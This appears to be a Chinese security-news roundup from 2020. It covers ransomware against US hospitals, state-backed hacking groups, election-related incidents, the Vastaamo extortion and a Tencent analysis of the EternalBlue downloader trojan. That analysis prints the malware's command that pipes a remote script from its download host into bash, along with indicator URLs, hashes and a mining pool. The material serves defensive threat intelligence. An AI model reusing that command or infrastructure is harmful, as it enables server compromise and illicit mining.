标签: 网络攻击

威斯康辛州共和党在美大选前被黑客盗走 230 万美元

据外媒报道,就在美大选前几周,黑客通过操纵发票的手段从威斯康辛州共和党那里窃取了230万美元。据悉,这起盗窃案在10月22日被注意到,威斯康辛州共和党主席Andrew Hitt表示,FBI目前正在调查此案。 据Hitt介绍,黑客使用了来自竞选团队合作的几家供应商的伪造发票,这些发票主要用于竞选邮递和特朗普周边商品等。这些文件没有提供供应商的付款信息,而是将钱转给了黑客。 这种黑客攻击实际上是一种相当常见的骗局:Facebook和谷歌在2017年也曾遭受过类似的网络钓鱼攻击,当时涉案金额高达1亿美元。骗子经常使用假发票来针对企业、组织和其他团体,希望能在合法发票的基础上偷到假发票。考虑到在大选前最后几周进行竞选活动是多么得疯狂,所以很容易想象那些诈骗发票是如何漏掉的。 威斯康辛州被认为是特朗普和拜登在即将到来的选举中必不可少的州。     (消息及封面来源:cnBeta)

FBI 称黑客将针对美国医院展开大规模勒索软件活动

医院长期以来一直是勒索软件攻击的热门目标。随着医疗设施在Covid-19患者的压力下紧张起来,FBI警告说要提防新的攻击活动。据报道,过去几天已经有几家医院遭到袭击。FBI、卫生与人类服务部(HHS)和国土安全部网络安全与基础设施安全局(CISA)联合发布了一份网络安全预警,称他们收到了关于美国医院和医疗机构面临的网络犯罪威胁增加且迫在眉睫的可靠信息。 CISA、FBI和HHS分享这一信息是为了向医疗服务提供者提供警告,以确保他们及时采取合理的预防措施,保护他们的网络免受这些威胁。Hold Security公司的首席执行官Alex Holden表示,上周他在监测到几家医院的攻击企图后向当局发出警报。Holden补充说,犯罪分子一直在利用暗网讨论针对400家医院和其他医疗机构的计划,并向每个目标索要500万至1000万美元的赎金。 网络安全公司Mandian的首席技术官Charles Carmakal已经确定该犯罪团伙为俄语UNC1878,他称其为 “我在职业生涯中观察到的最无耻、最无情、最具有破坏性的威胁行为者之一”。攻击者正在使用Trickbot恶意软件提供Ryuk勒索软件,去年对Key Biscayne和Lake City政府的攻击以及上个月对Universal Health Services(UHS)的攻击都使用了该软件。美国有线电视新闻网(CNN)报道称,纽约的圣劳伦斯卫生系统、俄勒冈州的天湖医疗中心和UHS(再次)在过去几天里成为攻击目标。 虽然这些攻击事件恰逢美国大选,但据说犯罪分子完全是出于利益的考虑。与勒索软件的一贯做法一样,当局建议受害者不要以加密货币方式支付赎金,因为它不能保证他们的文件会被恢复。但正如我们之前所看到的那样,绝望的医院往往别无选择,只能交钱。     (消息及封面来源:cnbeta)  

永恒之蓝木马下载器再更新,云上主机成为新目标

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/953ZHaf8IjLGyxB3tWSoDQ 一、概述 腾讯安全威胁情报中心检测到永恒之蓝下载器木马新增利用Hadoop Yarn未授权访问漏洞攻击。该变种入侵Linux服务器后下载门罗币挖矿木马,然后将挖矿任务进行持久化、清除竞品挖矿木马,并通过SSH爆破横向移动。 永恒之蓝下载器木马自2018年底出现以来,一直处于活跃状态。该病毒不断变化和更新攻击手法,从最初只针对Windows系统扩大攻击范围到Linux系统。截止目前,其攻击手法已涵盖弱口令爆破、系统漏洞利用、Web漏洞利用等,其中利用SSH、Redis、Hadoop Yarn服务的攻击方式可能对云主机以及云上业务造成较大威胁。其主要入侵方式列表如下: 腾讯安全系列产品针对永恒之蓝下载器木马最新变种的响应清单如下 : 应用场景 安全产品 解决方案 威胁情报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)永恒之蓝下载器木马黑产团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)永恒之蓝下载器木马黑产团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞   有关云防火墙的更多信息,可参考:  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 已支持检测: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞   腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 网络资产风险监测系统 (腾讯御知) 1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 基于网络流量进行威胁检测,已支持检测: 1)永恒之蓝漏洞MS17-010; 2)SMBGhost漏洞CVE-2020-0796; 3)Redis未授权访问漏洞; 4)Hadoop Yarn未授权访问漏洞   关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序;   腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、详细分析 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,YARN是hadoop系统上的资源统一管理平台,其主要作用是实现集群资源的统一管理和调度,可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上,通过YARN来管理资源。用户可以向YARN提交特定应用程序进行执行,其中就允许执行相关包含系统命令。 YARN提供有默认开放在8088和8090的REST API(默认前者)允许用户直接通过API进行相关的应用创建、任务提交执行等操作,如果配置不当,REST API将会开放在公网导致未授权访问的问题,攻击者可以在未授权的情况下远程执行代码。 永恒之蓝下载器木马变种在yarnexec()函数中对yarn未授权访问漏洞进行利用。 攻击成功后执行远程命令: export src=yarn;curl -fsSL t.amynx.com/ln/core.png?yarn|bash core.png首先下载门罗币挖矿木马d.ackng.com/ln/xr.zip并启动挖矿进程/.Xll/xr,然后添加crontab定时任务将挖矿作业持久化。 清除竞品挖矿木马: 利用SSH爆破进行横向移动: 永恒之蓝下载器木马历次版本更新情况如下:  IOCs URL http[:]//d.ackng.com/ln/xr.zip http[:]//t.amynx.com/ln/core.png http[:]//t.amynx.com/ln/a.asp http[:]//t.jdjdcjq.top/ln/a.asp MD5 if.bin 888dc1ca4b18a3d424498244acf81f7d a.jsp(powershell) c21caa84b327262f2cbcc12bbb510d15 kr.bin e04acec7ab98362d87d1c53d84fc4b03 core.png e49367b9e942cf2b891f60e53083c938 a.jsp(shell) b204ead0dcc9ca1053a1f26628725850 gim.jsp b6f0e01c9e2676333490a750e58d4464 矿池: lplp.ackng.com:444 参考链接: 1. Hadoop Yarn REST API未授权漏洞利用挖矿分析 https://www.freebuf.com/vuls/173638.html 2. 关于Apache Hadoop Yarn资源管理系统REST API未授权漏洞通知 https://bbs.qcloud.com/thread-50090-1-1.html 3. 永恒之蓝下载器最新变种重启EXE文件攻击,新变种已感染1.5万台服务器 https://s.tencent.com/research/report/1038.html 4.https://github.com/vulhub/vulhub/blob/master/hadoop/unauthorized-yarn/exploit.py (封面来自网络)

朝鲜黑客组织 Kimsuky 的持续性网络攻击

网络安全报告书由网络安全基础设施安全局(CISA)、联邦调查局(FBI)和美国网络司令部国家宣教部队(CNMF)联合撰写,主要描述了针对朝鲜高级黑客组织Kimsuky网络攻击所使用的战术、技术和程序(TTP)。 本文描述了截止2020年7月已知的Kimsuky黑客网络攻击事件,旨在保护相关组织免受该黑客影响。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1384/     消息来源:us-cert.cisa.gov ,封面来自网络,译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

美一黑客更改佛罗里达州长地址 致其无法顺利投票

据外媒报道,当佛罗里达州州长Ron DeSantis在周一前去投票时一名投票工作人员告诉他,他的地址跟指定的投票地点不符。他的地址在他不知情的情况下被更改了,州长立即联系了警方调查发生了什么。 根据警方的记录,调查将警方引向了20岁的Anthony Steven Guevara的家。 Guevara告诉警方,他可以用公开信息改变地址如州长的姓、名和他的生日。 距离美国选举日还只有不到一周的时间,网络安全官员们都在警惕试图影响投票的黑客,无论是通过对竞选活动展开的直接攻击还是通过社交媒体上进行的虚假信息活动。 虽然黑客不太可能改变选票计数,但他们仍能攻击选举基础设施如选民登记数据库。FBI警告称,伊朗黑客正在利用选举记录对佛罗里达州的选民进行攻击和恐吓。2016年美国总统大选期间,该州也受了网络攻击,当时俄罗斯黑客访问了选民数据库。 但DeSantis的地址变更并不是由复杂的网络攻击造成,对此,佛罗里达州务卿Laurel Lee称其选举系统是安全的。 科利尔县警长办公室表示,他们是在要求对DeSantis的选民登记记录进行时间戳更改后才找到Guevara的。警方表示,他们收到了一个跟这起变更有关的Comcast IP地址并向该互联网供应商发出了传票以此提供该地址。 调查人员在查看了Guevara的电脑后发现他登录了佛罗里达州务院的网站并在维基百科上查找了DeSantis的名字。法庭记录没有显示Guevara是如何改变DeSantis的地址的完整细节,该州的选举官员也没有回答这是如何发生的或安全问题是否已经得到解决。 佛罗里达州执法部门表示,Guevara还访问了迈克尔·乔丹和勒布朗·詹姆斯等名人的选民登记,但没有改变他们记录的任何细节。 根据警方的记录,Guevara被控未经同意更改选民登记并需缴5000美元的保释金。     (消息及封面来源:cnbeta)

FBI 探查近期美国医院遭受的一系列勒索软件攻击

据路透社消息,东欧犯罪分子正在用勒索软件瞄准数十家美国医院,联邦官员周三敦促医疗机构迅速加强准备工作,以防他们成为下一个目标。据三位熟悉此事的网络安全顾问透露,美国联邦调查局(FBI)正在调查最近的攻击事件,其中包括本周刚刚公开的俄勒冈州、加利福尼亚州和纽约的事件。 专家表示,这些攻击事件背后可能的组织被称为“Wizard Spider”或UNC 1878。他们警告说,这种攻击会扰乱医院的运作,导致生命的离去。这些攻击促使FBI和国土安全局官员在周三为医院管理者和网络安全专家主持了一次电话会议。 一名与会者告诉路透社记者,政府官员警告医院要确保他们的备份系统正常,尽可能将系统与互联网断开,并避免使用个人电子邮件账户。FBI没有立即回应评论请求。 “这似乎是一次协调的攻击,旨在专门破坏全美各地的医院,”美国网络安全公司Recorded Future的威胁情报分析师Allan Liska说。 “虽然每周针对医疗服务提供者的多起勒索软件攻击已经屡见不鲜,但这是我们第一次看到同一勒索软件行为者在同一天内针对六家医院进行攻击。” 在过去,医院的勒索软件感染已经使患者记录保存数据库瘫痪,这些数据库关键性地存储了最新的医疗信息,影响了医院的医疗服务能力。熟悉攻击事件的三名顾问中的两名表示,网络犯罪分子普遍使用一种名为 “Ryuk “的勒索软件,这种软件会锁定受害者的电脑,直到收到付款。 这位电话会议参与者说,政府官员透露,攻击者使用Ryuk和另一种名为Trickbot的木马来对付医院。 “UNC1878是我在职业生涯中观察到的最无耻、最无情、最具有破坏性的威胁行为者之一,”美国网络事件响应公司Mandiant高级副总裁Charles Carmakal说。“多家医院已经受到Ryuk勒索软件的重大影响,他们的网络已经被关闭。” 专家表示,在本月早些时候微软努力破坏黑客网络之后,Trickbot的部署意义重大。 网络犯罪分析师Stefan Tanase表示,这一举措旨在削弱网络犯罪分子的能力,但他们似乎已经迅速恢复。“我们在这里看到的是确认Trickbot被击垮的报道被大大夸大了。” 微软没有回答置评请求。     (消息来源:cnbeta;封面来自网络)

微软称伊朗黑客正密集攻击高价值的国际会议参与者

微软表示,由伊朗政府支持的黑客针对两个国际安全和政策会议的100多名高调的潜在与会者发动攻击。这个名为Phosphorus(或APT35)的组织发送了伪装成慕尼黑安全会议(国家元首出席的主要全球安全和政策会议之一)和定于本月晚些时候在沙特阿拉伯举行的Think 20峰会组织者的伪装邮件。 微软表示,这些伪造的电子邮件是发给前政府官员、学者和政策制定者,目的是窃取密码和其他敏感数据。 当被问及这次行动的目标是什么时,微软没有发表评论,但该公司的客户安全和信任主管汤姆-伯特表示,这些攻击是为了 “情报收集目的”。攻击成功地损害了几名受害者,包括前大使和其他高级政策专家,他们帮助制定各自国家的全球议程和外交政策。微软表示,已经与会议组织者合作,并将继续警告他们的与会者,微软正在披露我们所看到的情况,以便每个人都能对这种攻击方法保持警惕。 微软表示,攻击者会给目标写一封用完美英语书写的邮件,邀请目标参加会议。在目标接受邀请后,攻击者会试图欺骗受害者在一个虚假的登录页面上输入他们的电子邮件密码。随后,攻击者再登录邮箱,窃取受害者的电子邮件和联系人。该组织之前的黑客活动也曾试图窃取高知名度受害者的密码。由于伊朗驻纽约领事馆网站瘫痪,无法联系到伊朗领事馆发表评论。 众所周知,Phosphorus(或APT35)的目标是高调的个人,比如政治家和总统候选人。但微软表示,这次最新的攻击与即将举行的美国总统选举无关。去年,微软表示已经通知了超过1万名国家支持的黑客攻击的受害者,这些黑客包括包括Phosphorus和另一个伊朗支持的组织Holmium,也就是APT 33。3月,这家科技巨头获得了一项法院命令,要求控制Phosphorus使用的域名,这些域名被用来使用虚假的谷歌和雅虎登录页面窃取凭证。     (消息来源:cnbeta;封面来自网络)

俄罗斯政府支持的高级黑客持续攻击美国政府网络

由联邦调查局(FBI)和网络安全基础设施安全局(CISA)联合撰写的网络安全报告书,记载有关俄罗斯政府支持的、针对美国政府及航空网络的恶意攻击事件。该报告书持续更新CISA-FBI联合网络安全的相关信息。 最早从2020年9月起,由俄罗斯政府支持的、被称为Berserk Bear、Energetic Bear、TeamSpy、Dragonfly、Havex、Crouching Yeti和Koala的APT黑客就开展了针对美国政府的网络攻击。该APT黑客企图攻击多个SLTT组织并成功破坏了其网络基础设施,截至2020年10月1日,已窃取了至少两台服务器的数据。 … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1383/       消息来源:us-cert.cisa.gov ,封面来自网络,译者:小江。 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

黑客攻破芬兰心理治疗公司 Vastaamo 并公布数百人的健康数据

据外媒报道,当地时间上周五,有关一群黑客勒索一家为公共卫生系统提供心理治疗服务的私人公司的丑闻结果令芬兰人震惊。在一个号称在数字化和数据安全方面处于领先地位的国家,犯罪分子在检测到Vastaamo公司系统中的漏洞后成功访问了该公司数千名客户的数据库。 根据Vastaamo网站介绍,该公司为抑郁症和焦虑症患者提供心理和精神治疗。许多客户来自由Finnish Social Security (Kela)支付的公共服务部门。 据悉,勒索者索要约45万欧元(以比特币形式支付)以换取不公布数千人的临床和心理健康数据。 而在两日前,犯罪分子开始在加密网络Tor上发布数据,每天发布100个人。他们声称除非收到钱否则不会罢休。由于该公司拒绝接受黑客的要求,于是包括未成年人在内的200多人的个人数据被公布在网上。 被公布的信息非常敏感,包括患者的姓名、个人身份证号码、电话号码、电子邮件地址和居住地址以及治疗过程的内容。 据Vastaamo在新闻稿中披露,一位不知名的敌对方联系了他们并声称从该公司的客户那里获取了机密信息,对此,芬兰中央刑事警察已经展开刑事调查,另外他们还立即通知了芬兰网络安全中心、Valvira和数据保护专员。此外,Vastamo还立即采取了措施,跟外部独立安全专家合作来解释清楚这件事情。 据了解,有100人的数据于周四晚被公布。但在周五早上,发布数据的页面被删除,这引发了人们对Vastamo可能向敲诈者支付报酬的传言。不过截止到目前,该公司既没有承认也没有否认这笔付款。Vastaamo董事会主席Tuomas Kahri告诉报纸Ilta Sanomat,他不会对赎金的指控发表评论。 关于勒索者的身份或国籍目前则都不清楚,他们似乎并不担心当局可能会逮捕他们。周四,Ilta Sanomat跟他们交换了几条信息。这些罪犯表示,他们不知道公布的信息中有未成年人的数据。不过他们保证这不会停止他们的行动。 据披露,勒索者还向患者个人提供了一种可能,即用价值540欧元的比特币删除他们自己的数据。 芬兰国家调查局(KRP)正在调查这次攻击,该机构认为这是一起严重侵犯和传播私人信息的案件。警方要求那些注意到自己私人信息被传播的人提交一份电子犯罪报告。 在这起勒索案中,该公司因未能提前通知客户数据被泄露而受到批评。一些人抱怨称,他们是在公众知道这件事之后才被联系上的。     (消息来源:cnbeta;封面来自网络)

参与大规模“网络碉堡”犯罪的 4 名荷兰人在德国受审

据荷兰媒体报道, 四名荷兰人是目前在德国受审的八人之一,他们在为全世界犯罪分子用来进行数百万欧元的非法交易的暗网计算机中心提供主机服务方面发挥了作用。这八人被指控通过存放在摩泽尔河附近一个废弃的地堡中的服务器,促成了超过249000起犯罪。被作为一个更容易访问数据的快速切入点。 该地堡是荷兰国民Herman Johan Xennt在2013年购买的,据报道,他在托管活动中遇到麻烦后离开了荷兰,他的服务器也存放在泽兰的一个地堡中。总共有4名荷兰人、3名德国人和1名保加利亚人嫌疑人–年龄从20岁到60岁不等–被指控与“网络碉堡”(cyberbunker)活动有关。 Telegraaf周二表示,通过服务器处理的交易包括毒品–Cannabis Road等平台–拥有数百万活跃用户。该报称,其他网站允许人们订购假钱和身份证,该地堡还被用来对德国电信公司德国电信进行僵尸攻击。对该“网络碉堡”的调查历经多年的观察和电话窃听,最终在2019年9月的一次有650名警察参与的突袭行动中取得突破。该案的受审计划进行到2021年。     (消息来源:cnbeta;封面来自网络)